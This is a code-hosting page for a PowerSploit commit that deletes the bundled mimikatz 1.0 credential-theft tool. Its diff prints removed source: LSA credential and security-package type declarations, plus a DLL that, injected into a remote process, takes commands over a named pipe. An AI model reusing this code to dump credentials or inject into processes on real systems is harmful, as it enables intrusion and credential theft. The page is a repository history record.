Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Removed mimikatz. 

This doesn't need to reside in PowerSploit. Those that are truly
paranoid should validate that the embedded executable in
Invoke-Mimikatz.ps1 is indeed mimikatz.

This was causing AV to flag upon downloading PowerSploit.
This commit is contained in:
mattifestation 2014-02-03 17:13:35 -05:00
parent d9ca5357e4
commit c5168cdba6
289 changed files with 0 additions and 16310 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Exfiltration/mimikatz-1.0/Win32/kappfree.dll
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/kappfree.exp
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/kappfree.lib
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/kelloworld.dll
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/kelloworld.exp
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/kelloworld.lib
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/klock.dll
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/klock.exp
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/klock.lib
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/mimikatz.dll
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/mimikatz.exe
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/mimikatz.exp
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/mimikatz.lib
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/sekurlsa.dll
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/sekurlsa.exp
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/Win32/sekurlsa.lib
View File

Binary file not shown.

128
Exfiltration/mimikatz-1.0/commun/globdefs.h
View File

@ -1,128 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#pragma warning(disable:4530)
#include <stdio.h>
#include <windows.h>
#include <ntsecapi.h>
#include <string>
#include <vector>
using namespace std;
#define SECURITY_WIN32
#define PAGE_SIZE 0x1000
#define MAX_DOMAIN_LEN 24
#define MAX_USERNAME_LEN 24
#define MIMIKATZ L"mimikatz"
#ifdef _M_X64
#define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)"
#else ifdef
#define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)"
#endif
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1)
#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2)
#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L)
#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;}
typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments);
typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND {
PKIWI_LOCAL_COMMAND ptrCommand;
wstring commandName;
wstring commandHelp;
_KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {}
_KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {}
} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND;
typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE {
wstring module;
wstring description;
vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes;
_KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {}
} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE;
typedef struct _CLIENT_ID {
PVOID UniqueProcess;
PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef const ULONG CLONG;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef STRING OEM_STRING;
typedef PSTRING POEM_STRING;
typedef CONST STRING* PCOEM_STRING;
/* System* */
typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]);
typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]);
typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]);
typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]);
/* CNG */
typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput);
typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject);
typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer);
typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer);
typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags);
typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags);
typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags);
typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey);
typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags);
/* Rtl* */
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId);
typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString);
typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString);
typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct);
typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize);
typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
typedef struct _RTL_BALANCED_LINKS {
struct _RTL_BALANCED_LINKS *Parent;
struct _RTL_BALANCED_LINKS *LeftChild;
struct _RTL_BALANCED_LINKS *RightChild;
CHAR Balance;
UCHAR Reserved[3];
} RTL_BALANCED_LINKS;
typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
typedef enum _RTL_GENERIC_COMPARE_RESULTS {
GenericLessThan,
GenericGreaterThan,
GenericEqual
} RTL_GENERIC_COMPARE_RESULTS;
typedef struct _RTL_AVL_TABLE {
RTL_BALANCED_LINKS BalancedRoot;
PVOID OrderedPointer;
ULONG WhichOrderedElement;
ULONG NumberGenericTableElements;
ULONG DepthOfTree;
PRTL_BALANCED_LINKS RestartKey;
ULONG DeleteCount;
PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
PRTL_AVL_FREE_ROUTINE FreeRoutine;
PVOID TableContext;
} RTL_AVL_TABLE, *PRTL_AVL_TABLE;

BIN
Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.2 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 9.4 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 15 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 15 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 15 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.2 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 9.4 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 15 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.2 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 9.4 KiB

BIN
Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 15 KiB

139
Exfiltration/mimikatz-1.0/commun/kmodel.cpp
View File

@ -1,139 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "kmodel.h"
HMODULE g_hModule = NULL;
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
if (ul_reason_for_call == DLL_PROCESS_ATTACH)
{
g_hModule = hModule;
HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL);
if(hThread && hThread != INVALID_HANDLE_VALUE)
{
return CloseHandle(hThread);
}
}
return TRUE;
}
DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
bool succes = false;
for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++)
{
succes = monCommunicator->createClient();
if(!succes)
{
Sleep(3000);
}
}
if(succes)
{
ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription"));
wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi";
if(maFonctionString)
{
wstring * maDescription = new wstring();
if(maFonctionString(maDescription))
{
monBuffer.append(L"\n\n");
monBuffer.append(*maDescription);
}
delete maDescription;
}
if(monCommunicator->writeToPipe(monBuffer))
{
for(;;)
{
if(monCommunicator->readFromPipe(monBuffer))
{
wstring fonction = monBuffer;
vector<wstring> arguments;
size_t monIndex = fonction.find(L' ');
if(monIndex != wstring::npos)
{
arguments = mod_parseur::parse(fonction.substr(monIndex + 1));
fonction = fonction.substr(0, monIndex);
}
string procDll(fonction.begin(), fonction.end());
ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str()));
if(maFonction)
{
if(maFonction(monCommunicator, &arguments))
{
monBuffer = L"@";
}
else // La fonction à retourné FALSE, il y a donc anomalie bloquante sur le canal
{
break;
}
}
else
{
monBuffer = L"@Méthode \'";
monBuffer.append(fonction);
monBuffer.append(L"\' introuvable !\n");
}
if(!monCommunicator->writeToPipe(monBuffer))
{
break;
}
}
else
{
break;
}
}
}
}
delete monCommunicator;
FreeLibraryAndExitThread(g_hModule, 0);
return 0;
}
bool sendTo(mod_pipe * monPipe, wstring message)
{
wstring reponse = L"#";
reponse.append(message);
return monPipe->writeToPipe(reponse);
}
__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
bool sendOk = sendTo(monPipe, L"pong");
for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++)
{
wstring maReponse = L" - argument:";
maReponse.append(*monArgument);
sendOk = sendTo(monPipe, maReponse);
}
if(sendOk)
sendOk = sendTo(monPipe, L"\n");
return sendOk;
}

21
Exfiltration/mimikatz-1.0/commun/kmodel.h
View File

@ -1,21 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "globdefs.h"
#include "mod_pipe.h"
#include "mod_parseur.h"
#define __kextdll extern "C" __declspec(dllexport)
typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments);
typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription);
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
DWORD WINAPI ThreadProc(LPVOID lpParameter);
bool sendTo(mod_pipe * monPipe, wstring message);
__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments);

239
Exfiltration/mimikatz-1.0/commun/secpkg.h
View File

@ -1,239 +0,0 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "globdefs.h"
#include <sspi.h>
#include <wincred.h>
typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
{
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;
typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) ();
typedef PVOID *PLSA_CLIENT_REQUEST;
typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
typedef struct _SECPKG_CLIENT_INFO {
LUID LogonId; // Effective Logon Id
ULONG ProcessID; // Process Id of caller
ULONG ThreadID; // Thread Id of caller
BOOLEAN HasTcbPrivilege; // Client has TCB
BOOLEAN Impersonating; // Client is impersonating
BOOLEAN Restricted; // Client is restricted
// NT 5.1
UCHAR ClientFlags; // Extra flags about the client
SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client
// NT 6
HANDLE ClientToken;
} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO;
typedef enum _LSA_TOKEN_INFORMATION_TYPE {
LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
typedef enum _SECPKG_NAME_TYPE {
SecNameSamCompatible,
SecNameAlternateId,
SecNameFlat,
SecNameDN,
SecNameSPN
} SECPKG_NAME_TYPE;
typedef struct _SECPKG_CALL_INFO {
ULONG ProcessId;
ULONG ThreadId;
ULONG Attributes;
ULONG CallCount;
PVOID MechOid; // mechanism objection identifer
} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO;
typedef enum _SECPKG_SESSIONINFO_TYPE {
SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED
} SECPKG_SESSIONINFO_TYPE;
typedef struct _SECPKG_PRIMARY_CRED {
LUID LogonId;
UNICODE_STRING DownlevelName; // Sam Account Name
UNICODE_STRING DomainName; // Netbios domain name where account is located
UNICODE_STRING Password;
UNICODE_STRING OldPassword;
PSID UserSid;
ULONG Flags;
UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known)
UNICODE_STRING Upn; // UPN of account (if known)
UNICODE_STRING LogonServer;
UNICODE_STRING Spare1;
UNICODE_STRING Spare2;
UNICODE_STRING Spare3;
UNICODE_STRING Spare4;
} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED;
typedef struct _SECPKG_SUPPLEMENTAL_CRED {
UNICODE_STRING PackageName;
ULONG CredentialSize;
#ifdef MIDL_PASS
[size_is(CredentialSize)]
#endif // MIDL_PASS
PUCHAR Credentials;
} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED;
typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
ULONG CredentialCount;
#ifdef MIDL_PASS
[size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*];
#else // MIDL_PASS
SECPKG_SUPPLEMENTAL_CRED Credentials[1];
#endif // MIDL_PASS
} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY;
typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer);
typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId);
typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId);
typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials);
typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials);
typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue);
typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length);
typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base);
typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length);
typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base);
typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress);
typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress);
typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy);
typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress);
typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID);
typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID);
typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle);
typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous);
typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId);
typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo);
typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent);
typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle);
typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer);
typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId);
typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info);
typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize);
typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size);
typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory);
typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem);
typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle);
typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize);
typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize);
typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle);
typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName);
typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus);
typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus);
typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status);
typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output);
